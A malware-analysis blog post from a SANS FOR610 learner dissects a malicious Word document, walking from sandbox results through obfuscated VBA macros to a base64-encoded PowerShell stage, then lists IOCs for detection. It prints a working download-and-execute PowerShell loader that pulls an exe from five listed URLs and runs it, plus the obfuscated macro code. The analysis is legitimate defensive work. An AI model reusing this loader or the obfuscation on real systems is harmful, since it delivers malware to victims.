FOR610: Reverse-Engineering Malware
I attended SANS FOR610: Reverse-Engineering Malware instructed by Jess Garcia in Copenhagen (Sep-17). I’m now studying for certification and using captured malware samples for doing exercises. In this post I go through
- Using public (OSINT) information;
- Behavioural analysis with sandboxes (via a public malware sandbox);
- Malicious Office documents.
Note that the purpose of the exercise is not to understand in detail every line of code in the malware. The analysis is done from an incident response point of view with the goal to extract useful Indicators of Compromise (IOCs), have a basic understanding of the malware and assess the impact of the malware.
MZZP3648741.doc
A received spam e-mail message included a link (not an attachment) pointing to a Word document. The Word document was
Filename: MZZP3648741.doc Size: 75776 bytes MD5: 1a4471c427c7b4d87f3edf0c150e4c89
Public / OSINT information
I downloaded the file on Mon 9-Oct-2017 and used the MD5 hash (do not upload files but use the hash) to check VirusTotal. The file was already recognised by VirusTotal and detected by 27 out of 60 AV-engines (upload time was 2017-10-09 14:37:31 UTC).
Note that the filename by which I got the sample (MZZP3648741) was not listed under the file names already seen by VirusTotal.
Based on VirusTotal you can already conclude that this sample
- May try to run other files, shell commands or applications;
- Makes use of macros;
- Was already analysed by a sandbox (via the VirusTotal community comments).
Analyse the sample with a sandbox
The report from VirusTotal told us that there is already a public sandbox report available via VxStream but I wanted to use my account with VMRay to analyse the behaviour of this file in another sandbox.
VMRay gives me a couple of screenshots of the running sample. Based on the screenshots I can conclude that the document tries to lure the user into enabling content (enable the macro to start).
The sandbox shows that Word starts a Powershell script, that spawns to a couple of exe’s.
c:\users\hjrd1koky ds8lujv\appdata\local\temp\59488.exe (Created File) c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\evtlaunch.exe (Created File) MD5: cffa5435c773932a8ef271a762ce7cfb c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\hhgqj.exe (Created File) MD5: 710a2d061953888d8efb6994c976b543
The PE header of the last exe contains a very recent compile time.
Based on the functions
- GetVolumeInformation
- GetEnvironmentStrings
- GetComputerName
- GetUserDefaultUILanguage
- SetupLogFile (from SETUPAPI.dll)
it is likely that the final exe (hhgqj.exe) is some sort of information stealer.
The VMRay analysis also provides the network indicators
matteostocchino.com/OpwqY/ 66.147.244.177 198.1.78.129 46.4.67.203 147.135.209.118
As the purpose of the exercise is to practice skills I will also manually analyse the Word document.
Malicious Office documents
Deciding what are the important streams in an Office document
Oledump tells us that the file contains a stream (8) with a VBA macro.
oledump.py MZZP3648741.doc
We can use olevba to get more info on the macro and document. It will tell us that
- when we open the document the macro autoopen will autostart (auto execute)
- there’s a possible suspicious shell command
- streams ‘Macros/VBA/ThisDocument’ and ‘Macros/VBA/Module1’ contain information that we should further analyse
olevba.py MZZP3648741.doc -a
Now let’s have a look at ‘Macros/VBA/ThisDocument’ (stream 9).
oledump.py MZZP3648741.doc -s 9 -v
oledump.py MZZP3648741.doc -s 8 -v -a
Analysing the VBA code
The VBA macro contains two functions and two subs (FYI : functions return a value, a sub doesn’t). None of the functions or subs use arguments.
The previous analysis showed that the sub autoopen is called when opening the document. The VBA code in autoopen() (but also in the other functions and subs) is obfuscated by code that pretends to represent ASCII values but are nothing more than mathematical functions.
Sub autoopen() avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79 DyEAfVFbGY tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66 End Sub
Removing the obfuscation results in code that contains a number of variable assignments and a call to the sub DyEAfVFbGY. Besides the benefit of visual obfuscation I can not explain the reason for using the variable assignments (avrPreFPA, XsdndfxXk, etc.) and to my understanding they do not influence the flow of the code.
avrPreFPA = 1553 XsdndfxXk = 1284 epHeyVxU = 1309 tzyGYTAbft = 1617 ynpsKeY = 1981 HrgnxUf = 1292 Call sub DyEAfVFbGY tFFBpbzEVBD = 2179 wWxbdvzHZu = 1965 UwkSNDsM = 1248 rBfuFxXEn = 1385 ZNZYbtVGX = 1936 NDwLRskNRm = 1292 VCLfrCtNZC = 1506
Jumping to the sub DyEAfVFbGY results in code with similar visual obfuscation and a call to the function SMUpGxrua. If we deobfuscate the code we end up with a function definition of
Function SMUpGxrua() hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " " Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0 End Function
That’s a lot of variables and none of the variables have been previously assigned or have a related function/sub, except one : TxxdszysVP. This function TxxdszysVP uses the same visual obfuscation and, after deobfuscation, contains
Function TxxdszysVP() AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC End Function
A function needs to return a value. Because TxxdszysVP is called as a function we need to point our attention to where TxxdszysVP is assigned a value. Besides the obfuscation there’s also a part that contains ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv).
What is AKMnVPdkUnv? This value has been defined previously and, after deobfuscation, contains the string “comments” (“comme” + “nts”).
So, after removing all the obfuscation we can conclude that the VBA code calls the comment properties of the Office document.
How do you extract the document properties (including the comments)? With oledump!
oledump.py MZZP3648741.doc -M
The output of this command shows a lot of “weird” characters in the comments section. That’s also the section that is referenced by the VBA code. The last part of the comments section shows ‘==’. Why not use the base64dump utility to parse the output?
oledump.py MZZP3648741.doc -M | base64dump.py -d -s 7
The output looks like code that uses string manipulation to build a Powershell command. The actual execution is done via the combination of string manipulation (Mid +”e” ) and the Shell command that is launched with the ,0 option (meaning vbHide or hidden).
The easiest way to debug Powershell code is by using Powershell ISE.
The last part of the code is |invOkE-ExprEssiON. We can print the code that would be executed by replacing it with Write-Host.
This then results in a new web client object.
$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://matteostocchino.com/OpwqY/,http://damanidigital.com/w/,http://on-int .com/JJEKjn/,http://ardentfilms.com/WuU/,http://markjgriffin.ie/Iy/'.Split(',');$name = $random.next(1 , 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($ url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
This code attempts to download an exe from 5 different sites and then stores the retrieved file with a filename consisting of a random number between 1 and 65536. At the time of writing, only one site was still active.
MD5 (index.html.exe) = cffa5435c773932a8ef271a762ce7cfb
Verifying conclusions from manual analysis with sandbox analysis
Based on the sandbox analysis we would have concluded that the file 59488 would be an IOC. However, analysing the actual code shows that this filename was randomly generated. The code also showed that next to the network IOC detected by VMRay there were 4 other URLs included.
- The filename is randomly generated between 1 and 65536;
- 5 different URLs are used to download a second stage of the malware.
In this case, doing the manual analysis costed more time but gave more detailed results. The information on the random file name could also be deducted by running the sample different times in a sandbox (in VMRay the sample was automatically analyzed 4 times, with 4 different MS Office versions).
Summary flow of the Office document
The workflow of the document was
- Lure user into enabling macro
- Obfuscated macro, autoopen() starts when macro’s enabled
- Different Subs / Functions, call to the comment property of the Office document
- Comments property contains base64 encoded Powershell
- Powershell script uses string manipulation to create and execute a web client object
- Web client downloads exe and stores it with a random filename
Summary IOCs
A proposal for detection can be done based on
- The network information found in the Powershell script
- Newly created filenames between 1 and 65536
- Launch of Powershell from the Word process
Ideally the network IOCs are added to the IDS and the DNS firewall (blackhole DNS zone).
Analyzing cffa5435c773932a8ef271a762ce7cfb
The analysis of the file downloaded via the Powershell script will be covered in a follow-up post. Based on the information from VirusTotal and VxStream this is an emotet sample.
Hi Koen, great article, thanks for sharing this information. I was at Brucon a few weeks ago and took a session called Malware Triage by Sean Wilson and Sergei Frankoff from openanalysis.net. They shared alot of interesting things that you might find useful, like the Sublime editor and CyberChef for various decoding tasks (https://gchq.github.io/CyberChef/)
Cheers, mitch
Hi Mitch,
Thank you for the info. Already a happy user of CyberChef ;-).
Will look into the slides of that presentation, especially for info on Sublime Editor. Thanks!
Koen
That is too gud .
We welcome yr next article .
Thanks man